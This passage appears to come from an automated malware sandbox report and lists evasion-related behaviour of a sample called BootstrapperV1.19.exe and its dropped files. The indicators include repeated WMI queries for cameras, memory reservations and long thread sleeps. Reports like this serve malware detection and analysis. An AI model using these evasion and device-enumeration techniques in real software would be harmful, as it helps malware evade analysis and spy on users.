                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeMemory allocated: 158ACAA0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeMemory allocated: 158C65B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeMemory allocated: 1B290000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeMemory allocated: D50000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeMemory allocated: 1AD40000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeMemory allocated: 3070000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeMemory allocated: 1B200000 memory reserve | memory write watch
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMemory allocated: 14C0000 memory reserve | memory write watch
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMemory allocated: 1B190000 memory reserve | memory write watch
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMemory allocated: 1200000 memory reserve | memory write watch
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMemory allocated: 16D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeMemory allocated: 1B090000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599780Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599671Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599453Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599343Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599234Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599125Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599015Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598906Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598796Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598686Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598578Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598468Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598233Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598125Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598015Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597906Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597796Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597687Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597578Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597468Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597359Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597249Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597140Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597031Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596921Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596812Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596703Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596593Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596484Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596375Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596265Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596156Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596046Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595929Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595780Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595671Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595562Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595453Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595343Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595234Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595125Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595015Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594906Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594796Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594687Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594578Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594468Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 600000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 599860
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 599454
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 598797
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 598516
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 597922
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 597547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 3600000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 597047
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 596547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 596157
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 595532
